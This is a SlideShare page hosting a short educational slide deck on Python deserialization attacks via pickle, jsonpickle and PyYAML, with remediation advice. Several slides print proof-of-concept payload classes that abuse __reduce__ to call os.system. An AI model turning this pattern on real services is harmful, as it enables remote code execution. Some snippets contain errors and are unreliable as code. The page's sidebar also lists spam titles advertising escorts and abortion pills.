SlideShare ist ein Scribd-Unternehmen logo

Python Deserialization Attacks

NSConclave
NSConclave

Learn how Deserialization tends to vulnerability and which python modules are vulnerable to deserialization attacks.

Software
1 von 33
Downloaden Sie, um offline zu lesen
Python Deserialization Attacks By Manmeet Singh Date - 28/04/2020
Contents ● Serialization Concept ● Why Deserialization tends to a vulnerability ? ● Python Modules vulnerable to Deserialization Vuln. ● Pickle Module ● JSONPickle Module ● PyYAML Module ● Remediation
Serialization Concept
Structured Data Variables Lists Strings Custom Objects Text Readable or Unreadable (Bytes) stream format
Why we need serialization? 1. Recovery of original Structure. 2. Minimize the bandwidth. 3. Calling of class objects.
● Thick client application and desktop programs. Example : metasploit, Pycharm, Intellij IDEA etc. ● APIs. ● Mobile applications Where is Serialization getting used ?
Why Deserialization tends to a vulnerability ?
Objects of classes can be serialized… And when they get deserialized, the class objects are reformed and do it purpose.
Yes, Calling of any existing class method is possible .. Even os.system()
Do developer of serialization libraries knew this?
Why it was made then? Application Class A Class B def abc(): ... Dynamically working with classes
Python Serialization Modules Vulnerable To Deserialization Vulnerability
● Pickle ● jsonpickle ● Pyyaml ● ruamel.yaml
Pickle Module
Pickling is a way to convert a python object (list, dict, etc.) into a character stream. The idea is that this character stream contains all the information necessary to reconstruct the object in another python script.
Serialization using pickle - pickle.dumps(Object) Deserialization using pickle - pickle.loads(stream) How to pickle and de-pickle ?
Byte stream ending with . (dot) Detecting use of pickle module
from pickle import dumps import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(dumps(payload())) How to exploit pickle deserialization ?
from pickle import loads loads(stream) How to exploit pickle deserialization ?
JSONPickle Module
jsonpickle will serialize complex Python objects to and from JSON.It also convert a pickled object into human readable form.
Serialization using jsonpickle - jsonpickle.encode(Object) Deserialization using jsonpickle - jsonpickle.decode(stream) How to jsonpickle and json de-pickle ?
It looks like normal JSON stream of data. Sometimes have a tag “py/” in it. Detecting use of jsonpickle module
from jsonpickle import encode import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(decode(payload())) How to exploit jsonpickle deserialization ?
from jsonpickle import decode decode(stream) How to exploit jsonpickle deserialization ?
PyYAML Module
Pyyaml python module is used to serialize objects in YAML (Yet Another Markup Language) format. So this module is used to process YAML data. ● Pyyaml version < 5.1 is directly vulnerable. (CVE-2017-18342) ● Pyyaml version >=5.1 and < 5.2 is vulnerable under certain condition. (CVE-2019-20477) ● Latest version 5.3.1 of Pyyaml is not vulnerable.
Serialization using pyyaml - yaml.dump(Object) Deserialization using pyyaml - yaml.load(stream) How to YAML serialize and deserialize ?
It will be in a YAML format. Detecting use of pyyaml/ruamel.yaml modules
from yaml import dump import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(dump(payload())) How to exploit pyyaml deserialization ?
from yaml import load load(stream) How to exploit pyyaml deserialization ?
Remediations For jsonpickle and pickle, Here, the general take-away would be the rule of thumb “Do not deserialize untrusted data” For Pyyaml, ● Use safe_dump() and safe_load() instead of dump() and load(). ● Use latest version of pyyaml.
Questions ?

Empfohlen

java.io - streams and files
java.io - streams and filesjava.io - streams and files
java.io - streams and files
Marcello Thiry
 
Java - Collections framework
Java - Collections frameworkJava - Collections framework
Java - Collections framework
Riccardo Cardin
 
Json
JsonJson
Json
krishnapriya Tadepalli
 
Exception handling
Exception handlingException handling
Exception handling
PhD Research Scholar
 
02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5
Eoin Keary
 
Understanding java streams
Understanding java streamsUnderstanding java streams
Understanding java streams
Shahjahan Samoon
 
Sequelize
SequelizeSequelize
Sequelize
Tarek Raihan
 
Java Course 8: I/O, Files and Streams
Java Course 8: I/O, Files and StreamsJava Course 8: I/O, Files and Streams
Java Course 8: I/O, Files and Streams
Anton Keks
 

Empfohlen

java.io - streams and files
java.io - streams and filesjava.io - streams and files
java.io - streams and files
Marcello Thiry
 
Java - Collections framework
Java - Collections frameworkJava - Collections framework
Java - Collections framework
Riccardo Cardin
 
Json
JsonJson
Json
krishnapriya Tadepalli
 
Exception handling
Exception handlingException handling
Exception handling
PhD Research Scholar
 
02. input validation module v5
02. input validation module v502. input validation module v5
02. input validation module v5
Eoin Keary
 
Understanding java streams
Understanding java streamsUnderstanding java streams
Understanding java streams
Shahjahan Samoon
 
Sequelize
SequelizeSequelize
Sequelize
Tarek Raihan
 
Java Course 8: I/O, Files and Streams
Java Course 8: I/O, Files and StreamsJava Course 8: I/O, Files and Streams
Java Course 8: I/O, Files and Streams
Anton Keks
 
Java servlet life cycle - methods ppt
Java servlet life cycle - methods pptJava servlet life cycle - methods ppt
Java servlet life cycle - methods ppt
kamal kotecha
 
Network programming in Java
Network programming in JavaNetwork programming in Java
Network programming in Java
Tushar B Kute
 
Oops concepts in php
Oops concepts in phpOops concepts in php
Oops concepts in php
CPD INDIA
 
Java 8-streams-collectors-patterns
Java 8-streams-collectors-patternsJava 8-streams-collectors-patterns
Java 8-streams-collectors-patterns
José Paumard
 
Serialization/deserialization
Serialization/deserializationSerialization/deserialization
Serialization/deserialization
Young Alista
 
Collection Framework in java
Collection Framework in javaCollection Framework in java
Collection Framework in java
CPD INDIA
 
Socket programming in Java (PPTX)
Socket programming in Java (PPTX)Socket programming in Java (PPTX)
Socket programming in Java (PPTX)
UC San Diego
 
Java I/O
Java I/OJava I/O
Java I/O
Jussi Pohjolainen
 
Php functions
Php functionsPhp functions
Php functions
JIGAR MAKHIJA
 
Java multi threading
Java multi threadingJava multi threading
Java multi threading
Raja Sekhar
 
Sql injection
Sql injectionSql injection
Sql injection
Mehul Boghra
 
9. Input Output in java
9. Input Output in java9. Input Output in java
9. Input Output in java
Nilesh Dalvi
 
Serialization & De-serialization in Java
Serialization & De-serialization in JavaSerialization & De-serialization in Java
Serialization & De-serialization in Java
InnovationM
 
Plsql programs
Plsql programsPlsql programs
Plsql programs
Knowledge Center Computer
 
Interface in java
Interface in javaInterface in java
Interface in java
PhD Research Scholar
 
Presentation on-exception-handling
Presentation on-exception-handlingPresentation on-exception-handling
Presentation on-exception-handling
Nahian Ahmed
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
input/ output in java
input/ output in javainput/ output in java
input/ output in java
sharma230399
 
Wrapper classes
Wrapper classes Wrapper classes
Wrapper classes
Kongu Engineering College, Perundurai, Erode
 
Java Streams
Java StreamsJava Streams
Java Streams
M Vishnuvardhan Reddy
 
From Java to Python: beating the Stockholm syndrome
From Java to Python: beating the Stockholm syndromeFrom Java to Python: beating the Stockholm syndrome
From Java to Python: beating the Stockholm syndrome
Javier Arias Losada
 
Java Serialization
Java SerializationJava Serialization
Java Serialization
imypraz
 

Weitere ähnliche Inhalte

Was ist angesagt?

Serialization/deserialization
Serialization/deserializationSerialization/deserialization
Serialization/deserialization
Young Alista
 
Socket programming in Java (PPTX)
Socket programming in Java (PPTX)Socket programming in Java (PPTX)
Socket programming in Java (PPTX)
UC San Diego
 

Was ist angesagt? (20)

Java servlet life cycle - methods ppt
Java servlet life cycle - methods pptJava servlet life cycle - methods ppt
Java servlet life cycle - methods ppt
 
Network programming in Java
Network programming in JavaNetwork programming in Java
Network programming in Java
 
Oops concepts in php
Oops concepts in phpOops concepts in php
Oops concepts in php
 
Java 8-streams-collectors-patterns
Java 8-streams-collectors-patternsJava 8-streams-collectors-patterns
Java 8-streams-collectors-patterns
 
Serialization/deserialization
Serialization/deserializationSerialization/deserialization
Serialization/deserialization
 
Collection Framework in java
Collection Framework in javaCollection Framework in java
Collection Framework in java
 
Socket programming in Java (PPTX)
Socket programming in Java (PPTX)Socket programming in Java (PPTX)
Socket programming in Java (PPTX)
 
Java I/O
Java I/OJava I/O
Java I/O
 
Php functions
Php functionsPhp functions
Php functions
 
Java multi threading
Java multi threadingJava multi threading
Java multi threading
 
Sql injection
Sql injectionSql injection
Sql injection
 
9. Input Output in java
9. Input Output in java9. Input Output in java
9. Input Output in java
 
Serialization & De-serialization in Java
Serialization & De-serialization in JavaSerialization & De-serialization in Java
Serialization & De-serialization in Java
 
Plsql programs
Plsql programsPlsql programs
Plsql programs
 
Interface in java
Interface in javaInterface in java
Interface in java
 
Presentation on-exception-handling
Presentation on-exception-handlingPresentation on-exception-handling
Presentation on-exception-handling
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
input/ output in java
input/ output in javainput/ output in java
input/ output in java
 
Wrapper classes
Wrapper classes Wrapper classes
Wrapper classes
 
Java Streams
Java StreamsJava Streams
Java Streams
 

Ähnlich wie Python Deserialization Attacks

Java Serialization
Java SerializationJava Serialization
Java Serialization
imypraz
 
Pursuing practices of Domain-Driven Design in PHP
Pursuing practices of Domain-Driven Design in PHPPursuing practices of Domain-Driven Design in PHP
Pursuing practices of Domain-Driven Design in PHP
Giorgio Sironi
 
Effective Scala: Programming Patterns
Effective Scala: Programming PatternsEffective Scala: Programming Patterns
Effective Scala: Programming Patterns
Vasil Remeniuk
 
Ts archiving
Ts archivingTs archiving
Ts archiving
Confiz
 
Object Oriented Programming All Unit Notes
Object Oriented Programming All Unit NotesObject Oriented Programming All Unit Notes
Object Oriented Programming All Unit Notes
BalamuruganV28
 
OpenERP Technical Memento
OpenERP Technical MementoOpenERP Technical Memento
OpenERP Technical Memento
Odoo
 

Ähnlich wie Python Deserialization Attacks (20)

From Java to Python: beating the Stockholm syndrome
From Java to Python: beating the Stockholm syndromeFrom Java to Python: beating the Stockholm syndrome
From Java to Python: beating the Stockholm syndrome
 
Java Serialization
Java SerializationJava Serialization
Java Serialization
 
CPP_,module2_1.pptx
CPP_,module2_1.pptxCPP_,module2_1.pptx
CPP_,module2_1.pptx
 
Pursuing practices of Domain-Driven Design in PHP
Pursuing practices of Domain-Driven Design in PHPPursuing practices of Domain-Driven Design in PHP
Pursuing practices of Domain-Driven Design in PHP
 
Serialization in java
Serialization in javaSerialization in java
Serialization in java
 
PHP OOP Lecture - 01.pptx
PHP OOP Lecture - 01.pptxPHP OOP Lecture - 01.pptx
PHP OOP Lecture - 01.pptx
 
Java basics
Java basicsJava basics
Java basics
 
A Dexterity Intro for Recovering Archetypes Addicts
A Dexterity Intro for Recovering Archetypes AddictsA Dexterity Intro for Recovering Archetypes Addicts
A Dexterity Intro for Recovering Archetypes Addicts
 
Object oriented approach in python programming
Object oriented approach in python programmingObject oriented approach in python programming
Object oriented approach in python programming
 
New c sharp4_features_part_v
New c sharp4_features_part_vNew c sharp4_features_part_v
New c sharp4_features_part_v
 
обзор Python
обзор Pythonобзор Python
обзор Python
 
Effective Scala: Programming Patterns
Effective Scala: Programming PatternsEffective Scala: Programming Patterns
Effective Scala: Programming Patterns
 
Ts archiving
Ts archivingTs archiving
Ts archiving
 
Python and Zope: An introduction (May 2004)
Python and Zope: An introduction (May 2004)Python and Zope: An introduction (May 2004)
Python and Zope: An introduction (May 2004)
 
Object Oriented Programming All Unit Notes
Object Oriented Programming All Unit NotesObject Oriented Programming All Unit Notes
Object Oriented Programming All Unit Notes
 
Python Interview Questions For Experienced
Python Interview Questions For ExperiencedPython Interview Questions For Experienced
Python Interview Questions For Experienced
 
OpenERP Technical Memento
OpenERP Technical MementoOpenERP Technical Memento
OpenERP Technical Memento
 
PYTHON PPT.pptx
PYTHON PPT.pptxPYTHON PPT.pptx
PYTHON PPT.pptx
 
Tour de Jackson: Forgotten Features of Jackson JSON processor
Tour de Jackson: Forgotten Features of Jackson JSON processorTour de Jackson: Forgotten Features of Jackson JSON processor
Tour de Jackson: Forgotten Features of Jackson JSON processor
 
Object-oriented programming
Object-oriented programmingObject-oriented programming
Object-oriented programming
 

Mehr von NSConclave

Mehr von NSConclave (20)

RED-TEAM_Conclave
RED-TEAM_ConclaveRED-TEAM_Conclave
RED-TEAM_Conclave
 
Create a Custom Plugin in Burp Suite using the Extension
Create a Custom Plugin in Burp Suite using the ExtensionCreate a Custom Plugin in Burp Suite using the Extension
Create a Custom Plugin in Burp Suite using the Extension
 
IOT SECURITY ASSESSMENT Pentester's Approach
IOT SECURITY ASSESSMENT Pentester's ApproachIOT SECURITY ASSESSMENT Pentester's Approach
IOT SECURITY ASSESSMENT Pentester's Approach
 
Debugging Android Native Library
Debugging Android Native LibraryDebugging Android Native Library
Debugging Android Native Library
 
Burp Suite Extension Development
Burp Suite Extension DevelopmentBurp Suite Extension Development
Burp Suite Extension Development
 
Log Analysis
Log AnalysisLog Analysis
Log Analysis
 
Regular Expression Injection
Regular Expression InjectionRegular Expression Injection
Regular Expression Injection
 
HTML5 Messaging (Post Message)
HTML5 Messaging (Post Message)HTML5 Messaging (Post Message)
HTML5 Messaging (Post Message)
 
Node.js Deserialization
Node.js DeserializationNode.js Deserialization
Node.js Deserialization
 
RIA Cross Domain Policy
RIA Cross Domain PolicyRIA Cross Domain Policy
RIA Cross Domain Policy
 
LDAP Injection
LDAP InjectionLDAP Injection
LDAP Injection
 
Sandboxing
SandboxingSandboxing
Sandboxing
 
NoSql Injection
NoSql InjectionNoSql Injection
NoSql Injection
 
Thick Client Testing Advanced
Thick Client Testing AdvancedThick Client Testing Advanced
Thick Client Testing Advanced
 
Thick Client Testing Basics
Thick Client Testing BasicsThick Client Testing Basics
Thick Client Testing Basics
 
Markdown
MarkdownMarkdown
Markdown
 
Docker 101
Docker 101Docker 101
Docker 101
 
Security Architecture Consulting - Hiren Shah
Security Architecture Consulting - Hiren ShahSecurity Architecture Consulting - Hiren Shah
Security Architecture Consulting - Hiren Shah
 
OSINT: Open Source Intelligence - Rohan Braganza
OSINT: Open Source Intelligence - Rohan BraganzaOSINT: Open Source Intelligence - Rohan Braganza
OSINT: Open Source Intelligence - Rohan Braganza
 
Lets get started with car hacking - Ankit Joshi
Lets get started with car hacking - Ankit JoshiLets get started with car hacking - Ankit Joshi
Lets get started with car hacking - Ankit Joshi
 

Kürzlich hochgeladen

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Alberto González Trastoy
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
OnePlan Solutions
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 

Kürzlich hochgeladen (20)

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview Questions
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.com
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Models
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
Microsoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdfMicrosoft AI Transformation Partner Playbook.pdf
Microsoft AI Transformation Partner Playbook.pdf
 
VTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learnVTU technical seminar 8Th Sem on Scikit-learn
VTU technical seminar 8Th Sem on Scikit-learn
 
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected WorkerHow To Troubleshoot Collaboration Apps for the Modern Connected Worker
How To Troubleshoot Collaboration Apps for the Modern Connected Worker
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024
 
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
Crypto Cloud Review - How To Earn Up To $500 Per DAY Of Bitcoin 100% On AutoP...
 
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
 
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICECHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdf
 

Python Deserialization Attacks

  • 1. Python Deserialization Attacks By Manmeet Singh Date - 28/04/2020
  • 2. Contents ● Serialization Concept ● Why Deserialization tends to a vulnerability ? ● Python Modules vulnerable to Deserialization Vuln. ● Pickle Module ● JSONPickle Module ● PyYAML Module ● Remediation
  • 5. Why we need serialization? 1. Recovery of original Structure. 2. Minimize the bandwidth. 3. Calling of class objects.
  • 6. ● Thick client application and desktop programs. Example : metasploit, Pycharm, Intellij IDEA etc. ● APIs. ● Mobile applications Where is Serialization getting used ?
  • 7. Why Deserialization tends to a vulnerability ?
  • 8. Objects of classes can be serialized… And when they get deserialized, the class objects are reformed and do it purpose.
  • 9. Yes, Calling of any existing class method is possible .. Even os.system()
  • 10. Do developer of serialization libraries knew this?
  • 11. Why it was made then? Application Class A Class B def abc(): ... Dynamically working with classes
  • 12. Python Serialization Modules Vulnerable To Deserialization Vulnerability
  • 13. ● Pickle ● jsonpickle ● Pyyaml ● ruamel.yaml
  • 15. Pickling is a way to convert a python object (list, dict, etc.) into a character stream. The idea is that this character stream contains all the information necessary to reconstruct the object in another python script.
  • 16. Serialization using pickle - pickle.dumps(Object) Deserialization using pickle - pickle.loads(stream) How to pickle and de-pickle ?
  • 17. Byte stream ending with . (dot) Detecting use of pickle module
  • 18. from pickle import dumps import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(dumps(payload())) How to exploit pickle deserialization ?
  • 19. from pickle import loads loads(stream) How to exploit pickle deserialization ?
  • 21. jsonpickle will serialize complex Python objects to and from JSON.It also convert a pickled object into human readable form.
  • 22. Serialization using jsonpickle - jsonpickle.encode(Object) Deserialization using jsonpickle - jsonpickle.decode(stream) How to jsonpickle and json de-pickle ?
  • 23. It looks like normal JSON stream of data. Sometimes have a tag “py/” in it. Detecting use of jsonpickle module
  • 24. from jsonpickle import encode import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(decode(payload())) How to exploit jsonpickle deserialization ?
  • 25. from jsonpickle import decode decode(stream) How to exploit jsonpickle deserialization ?
  • 27. Pyyaml python module is used to serialize objects in YAML (Yet Another Markup Language) format. So this module is used to process YAML data. ● Pyyaml version < 5.1 is directly vulnerable. (CVE-2017-18342) ● Pyyaml version >=5.1 and < 5.2 is vulnerable under certain condition. (CVE-2019-20477) ● Latest version 5.3.1 of Pyyaml is not vulnerable.
  • 28. Serialization using pyyaml - yaml.dump(Object) Deserialization using pyyaml - yaml.load(stream) How to YAML serialize and deserialize ?
  • 29. It will be in a YAML format. Detecting use of pyyaml/ruamel.yaml modules
  • 30. from yaml import dump import os class payload(objects): def __reduce__(self): return os.system, (“dir”,) print(dump(payload())) How to exploit pyyaml deserialization ?
  • 31. from yaml import load load(stream) How to exploit pyyaml deserialization ?
  • 32. Remediations For jsonpickle and pickle, Here, the general take-away would be the rule of thumb “Do not deserialize untrusted data” For Pyyaml, ● Use safe_dump() and safe_load() instead of dump() and load(). ● Use latest version of pyyaml.